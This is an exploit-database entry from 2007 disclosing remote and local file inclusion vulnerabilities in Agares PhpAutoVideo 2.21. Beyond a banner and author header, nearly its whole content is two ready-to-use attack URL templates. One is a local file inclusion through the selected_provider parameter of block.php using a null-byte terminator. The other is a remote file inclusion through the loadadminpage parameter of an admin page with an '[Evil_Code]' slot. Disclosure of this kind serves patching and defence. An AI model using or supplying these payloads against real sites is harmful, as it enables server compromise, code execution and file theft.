id: 2398
date: 12/24/2007
title: Agares PhpAutoVideo 2.21 Remote/Local File Inclusion Vulnerabilities
author: MhZ91
cves: 

====================================================================
Agares PhpAutoVideo 2.21 Remote/Local File Inclusion Vulnerabilities
====================================================================




---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          

---------------------------------------------------------------

    Remote File Inclusion + Local File Inclusion

---------------------------------------------------------------

# Author: MhZ91
# Title: Agares PhpAutoVideo v2.21 - Remote File Inclusion + Local File Inclusion
# Download: http://scriptmafia.org/2007/12/19/agares_phpautovideo_v2.21.html
# Bug: Remote File Inclusion + Local File Inclusion

---------------------------------------------------------------

Local File Inclusion:

http://[site]/includes/block.php?selected_provider=[LFI]%00

---------------------------------------------------------------

Remote File Inclusion

http://[site]/admin/frontpage_right.php?loadadminpage=[Evil_Code]

---------------------------------------------------------------




#  0day.today [2023-03-24]  #